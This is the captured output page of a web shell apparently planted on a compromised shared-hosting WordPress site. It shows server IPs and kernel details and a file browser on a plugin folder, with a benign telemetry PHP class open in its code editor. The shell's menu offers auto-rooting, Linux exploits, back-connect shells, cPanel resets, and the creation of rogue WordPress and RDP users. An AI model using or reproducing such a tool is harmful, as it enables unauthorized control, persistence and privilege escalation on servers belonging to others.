Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.227.228.238
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
copy-delete-posts /
analyst /
src /
Http /
Requests /
[ HOME SHELL ]
Name
Size
Permission
Action
AbstractLoggerRequest.php
1.5
KB
-rw-r--r--
ActivateRequest.php
829
B
-rw-r--r--
DeactivateRequest.php
1.2
KB
-rw-r--r--
InstallRequest.php
715
B
-rw-r--r--
OptInRequest.php
820
B
-rw-r--r--
OptOutRequest.php
793
B
-rw-r--r--
UninstallRequest.php
693
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractLoggerRequest.php
<?php namespace Analyst\Http\Requests; use Analyst\ApiResponse; use Analyst\Collector; use Analyst\Contracts\RequestContract; use Analyst\Contracts\RequestorContract; abstract class AbstractLoggerRequest implements RequestContract { /** * @var Collector */ protected $collector; /** * @var integer */ protected $id; /** * @var string */ protected $path; public function __construct(Collector $collector, $pluginId, $path) { $this->collector = $collector; $this->id = $pluginId; $this->path = $path; } /** * Cast request data to array * * @return array */ public function toArray() { return [ 'plugin_id' => $this->id, 'php_version' => $this->collector->getPHPVersion(), 'wp_version' => $this->collector->getWordPressVersion(), 'plugin_version' => $this->collector->getPluginVersion($this->path), 'url' => $this->collector->getSiteUrl(), 'sdk_version' => $this->collector->getSDKVersion(), 'ip' => $this->collector->getServerIp(), 'mysql_version' => $this->collector->getMysqlVersion(), 'locale' => $this->collector->getSiteLanguage(), 'current_theme' => $this->collector->getCurrentThemeName(), 'active_plugins_list' => implode(', ', $this->collector->getActivePluginsList()), 'email' => $this->collector->getGeneralEmailAddress(), 'name' => $this->collector->getCurrentUserName() ]; } /** * Execute the request * @param RequestorContract $requestor * @return ApiResponse */ public abstract function execute(RequestorContract $requestor); }
Close